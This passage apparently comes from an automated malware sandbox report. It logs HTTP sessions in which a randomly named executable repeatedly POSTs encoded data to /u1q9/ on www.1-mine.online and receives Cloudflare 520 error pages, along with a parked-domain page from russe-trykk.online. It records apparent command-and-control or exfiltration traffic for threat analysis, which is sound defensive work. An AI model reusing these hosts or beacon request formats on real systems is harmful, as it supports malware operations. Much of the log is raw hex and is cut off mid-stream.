                                                                                                                                                                                                                        Data Ascii: 154a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.russe-trykk.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965363026 CEST1289INData Raw: 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 6c 6f 67 6f 63 6f 6e 74 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78
                                                                                                                                                                                                                        Data Ascii: margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 10px; } .langselect img { positi
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965409994 CEST1289INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 6e 61 6d 65 73 68 6f 70 2e 63 6f 6d 2f 77 68 6f 69 73 22 3e 57 68 6f 20 6f 77 6e 73 20 74 68 65 20 64 6f 6d 61 69 6e 3f 3c 2f 61 3e 27 2c 0a 20 20 20 20 20 20 20 20 6e 6f 3a 20
                                                                                                                                                                                                                        Data Ascii: ref="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.russe-trykk.online') + ' er registrert, men har ingen aktiv nettside enn. <br>Andre tjenester, som f.eks. epost, kan vre aktivt brukt
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965478897 CEST1289INData Raw: 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 74 22 3e 0a 20 20 20 20 20 20 20 20 77 77 77 2e 72 75 73 73 65 2d 74 72 79 6b 6b 2e 6f 6e 6c 69 6e 65 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: <div class="container"> <h1 id="t"> www.russe-trykk.online is parked </h1> <p id="m"> www.russe-trykk.online is registered, but the owner currently does not have an active website
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965518951 CEST565INData Raw: 20 20 20 3e 44 6f 6d 65 6e 65 73 68 6f 70 20 41 53 20 26 63 6f 70 79 3b 0a 20 20 20 20 20 20 20 20 32 30 32 34 3c 2f 73 70 61 6e 0a 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 26 6d 69 64 64 6f 74 3b 0a 20 20 20 20 20 20 3c 73 70 61 6e 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: >Domeneshop AS &copy; 2024</span > &middot; <span >Request ID: 42719508f6e23ba304db43dec0360e0f/parkedweb01 </span> </div> <script> q("ls").setAttribute("style", ""); fun


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        21192.168.11.2049813172.67.148.133805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.194228888 CEST808OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 75 58 2b 4d 68 62 6a 44 59 4a 77 55 59 4c 50 61 62 58 5a 55 43 69 70 4a 41 68 63 38 2f 47 57 48 38 63 64 6a 6c 59 46 38 72 33 49 44 76 49 6c 4a 6b 75 67 45 78 55 36 35 2f 48 4e 63 44 34 76 66 65 49 6a 38 4f 75 2f 46 43 67 2b 65 52 37 2f 6e 56 64 31 4c 38 70 76 79 55 48 37 4d 72 49 79 75 34 41 54 4e 56 75 37 4f 73 41 37 34 4d 66 39 34 37 6f 30 79 34 44 75 41 72 77 63 70 4e 6e 6f 45 67 62 7a 79 73 41 31 51 78 50 4f 74 47 64 78 71 65 63 67 6e 72 37 4d 77 69 35 5a 74 46 57 6a 77 2f 4b 63 37 50 39 61 2b 78 33 79 2b 37 4e 62 79 4d 4f 70 30 46 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8uX+MhbjDYJwUYLPabXZUCipJAhc8/GWH8cdjlYF8r3IDvIlJkugExU65/HNcD4vfeIj8Ou/FCg+eR7/nVd1L8pvyUH7MrIyu4ATNVu7OsA74Mf947o0y4DuArwcpNnoEgbzysA1QxPOtGdxqecgnr7Mwi5ZtFWjw/Kc7P9a+x3y+7NbyMOp0Fg==
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.537986040 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:55 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYxnqG%2FjZIA2DRKZbj8%2Fnd4ZmfVGr4ZxHfvdewIPwKx3VTTjyk1BY%2B0vJNl525P0W8OGnygHEXwNSoEl4XFVAifQYNWtGx6WvUdBJi7xpFXlZkBmVJOq9rZb02DyoMlfr3xTvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d7340734b807280-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=95045&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web server
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538037062 CEST1289INData Raw: 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43
                                                                                                                                                                                                                        Data Ascii: is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><me
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538203001 CEST1289INData Raw: 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20 77
                                                                                                                                                                                                                        Data Ascii: earfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538304090 CEST1289INData Raw: 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c
                                                                                                                                                                                                                        Data Ascii: te left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a hre
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538321018 CEST1289INData Raw: 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                                                                                                                                                        Data Ascii: /div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-no
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538572073 CEST1289INData Raw: 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d 45 72 72 6f 72 2d 35 32 30 22 3e 41 64 64
                                                                                                                                                                                                                        Data Ascii: r" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-fu
                                                                                                                                                                                                                        Oct 23, 2024 18:54:55.538585901 CEST383INData Raw: 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65
                                                                                                                                                                                                                        Data Ascii: ,c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        22192.168.11.2049814172.67.148.133805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:57.829647064 CEST828OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 73 33 4f 4d 74 62 66 44 4a 70 77 56 63 37 50 61 56 33 5a 51 43 69 74 4a 41 67 49 53 38 30 79 48 38 35 68 6a 69 5a 46 38 6d 58 49 44 6b 6f 6b 44 72 4f 67 62 78 55 33 45 2f 43 31 63 44 34 54 66 65 4d 6e 38 4f 2f 2f 45 45 67 2b 63 5a 62 2f 6c 59 39 31 4c 38 70 76 79 55 48 2b 5a 72 49 71 75 2f 77 44 4e 61 76 37 4e 76 41 37 37 4a 66 39 34 6f 34 31 35 34 44 76 54 72 31 46 2b 4e 6a 59 45 67 5a 37 79 73 54 74 54 2b 50 50 6d 49 39 77 57 62 63 42 4c 79 49 30 2b 76 6f 4a 4e 42 6d 62 51 33 38 52 68 53 50 75 61 79 6b 75 4d 2f 39 69 61 4f 4d 6f 76 59 6c 4f 53 34 48 61 76 31 55 53 50 6b 31 51 32 31 4b 7a 41 77 64 59 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS80yH85hjiZF8mXIDkokDrOgbxU3E/C1cD4TfeMn8O//EEg+cZb/lY91L8pvyUH+ZrIqu/wDNav7NvA77Jf94o4154DvTr1F+NjYEgZ7ysTtT+PPmI9wWbcBLyI0+voJNBmbQ38RhSPuaykuM/9iaOMovYlOS4Hav1USPk1Q21KzAwdY=
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170058966 CEST1289INHTTP/1.1 520
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:58 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 7195
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mk9e60SZ9N1mGtSkUqiDL4bbP18VrjEolXs9nWb%2FbtSKDeDswPRC3riPrEsFUrWGVVuVkgWhoj6yyWdAhShT6a8%2Be288%2FrQzTxyulzNzDoOnTI3teBEsxdX6AX5cIJP9lsMSMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734083c957c339-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94539&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 31 2d 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.1-mine.online | 520: Web server
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170197964 CEST1289INData Raw: 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43
                                                                                                                                                                                                                        Data Ascii: is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><me
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170312881 CEST1289INData Raw: 65 61 72 66 69 78 20 6d 64 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 62 72 6f 77 73 65 72 2d 73 74 61 74 75 73 22 20 63 6c 61 73 73 3d 22 20 72 65 6c 61 74 69 76 65 20 77
                                                                                                                                                                                                                        Data Ascii: earfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170442104 CEST1289INData Raw: 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c
                                                                                                                                                                                                                        Data Ascii: te left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a hre
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170522928 CEST1289INData Raw: 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 20 6d 62 2d 38 20 6c 67 3a 70 78 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                                                                                                                                                        Data Ascii: /div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-no
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170586109 CEST1289INData Raw: 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 32 30 30 31 37 31 39 33 36 2d 45 72 72 6f 72 2d 35 32 30 22 3e 41 64 64
                                                                                                                                                                                                                        Data Ascii: r" href="https://support.cloudflare.com/hc/en-us/articles/200171936-Error-520">Additional troubleshooting resources</a>.</p> </div> </div> </div> <div class="cf-error-footer cf-wrapper w-240 lg:w-fu
                                                                                                                                                                                                                        Oct 23, 2024 18:54:58.170608044 CEST383INData Raw: 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65
                                                                                                                                                                                                                        Data Ascii: ,c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        23192.168.11.2049815172.67.148.133805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:55:00.454953909 CEST1289OUTPOST /u1q9/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.1-mine.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.1-mine.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.1-mine.online/u1q9/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 75 66 66 67 73 47 4d 71 64 5a 55 38 73 33 4f 4d 74 62 66 44 4a 70 77 56 63 37 50 61 56 33 5a 51 43 69 74 4a 41 67 49 53 38 30 36 48 2f 4c 35 6a 6b 36 74 38 6e 58 49 44 36 59 6b 41 72 4f 67 53 78 56 66 49 2f 43 77 70 44 39 58 66 63 70 7a 38 66 36 66 45 58 41 2b 63 56 37 2f 6d 56 64 31 65 38 74 4c 32 55 48 75 5a 72 49 71 75 2f 32 48 4e 54 65 37 4e 70 41 37 34 4d 66 39 4f 37 6f 31 52 34 44 6d 6d 72 30 78 75 4e 53 6b 45 68 35 72 79 71 68 31 54 68 2f 50 6b 4c 39 77 4f 62 63 4e 55 79 49 35 48 76 6f 39 33 42 6c 72 51 7a 70 6b 4f 41 72 32 73 6f 53 75 52 67 73 6d 4f 41 4f 78 78 47 57 53 31 30 68 43 67 37 43 65 61 37 58 67 58 70 4a 54 61 78 61 73 69 39 50 33 4b 34 30 77 73 6e 33 55 6e 64 77 32 4e 56 66 63 38 73 66 6b 4b 67 66 49 6c 50 68 74 49 79 49 37 51 7a 79 76 4b 56 47 61 39 6f 4b 41 36 74 41 52 2f 4e 74 70 54 5a 68 45 31 2b 44 41 59 38 39 53 53 4f 6d 39 4e 30 4a 78 59 35 70 2f 55 2b 46 34 4e 41 50 73 63 6a 6b 4f 53 49 54 54 57 4b 66 64 45 38 78 43 69 62 52 6a 43 2f 5a 31 47 64 58 65 4a [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=uffgsGMqdZU8s3OMtbfDJpwVc7PaV3ZQCitJAgIS806H/L5jk6t8nXID6YkArOgSxVfI/CwpD9Xfcpz8f6fEXA+cV7/mVd1e8tL2UHuZrIqu/2HNTe7NpA74Mf9O7o1R4Dmmr0xuNSkEh5ryqh1Th/PkL9wObcNUyI5Hvo93BlrQzpkOAr2soSuRgsmOAOxxGWS10hCg7Cea7XgXpJTaxasi9P3K40wsn3Undw2NVfc8sfkKgfIlPhtIyI7QzyvKVGa9oKA6tAR/NtpTZhE1+DAY89SSOm9N0JxY5p/U+F4NAPscjkOSITTWKfdE8xCibRjC/Z1GdXeJLHqftlMGlOnPj4PGvRGzHhiH2ddhNeDPS0+1VJy3+8ZIIViYjDqKfkwR8M8/NsS5agMkLsQyg9DNYjQ5WWrtKRKFnpOxNUeHBvubNqt3VlhhQ7TlHvuTdR8GMB1fotzt4ReM8zhuPoNDi+vkwV8tL2bNH7R8TZVEjj+JNSzhMU/i84TIUzSkDOSrijdJC05DLmCpPIPRzx6RLkF+xJtx8sYorf4MFrrnXKGIMGGSgOj9KbMZTvyEh5AY/rjwTqirwdDi/HmboaCgcYl3iPY4vr5GRiZ6aqW44RDaz25BwcQP810svrXIfIZ44xweqIWEm5OTt78kG7l1d1WGTOoQsnDK
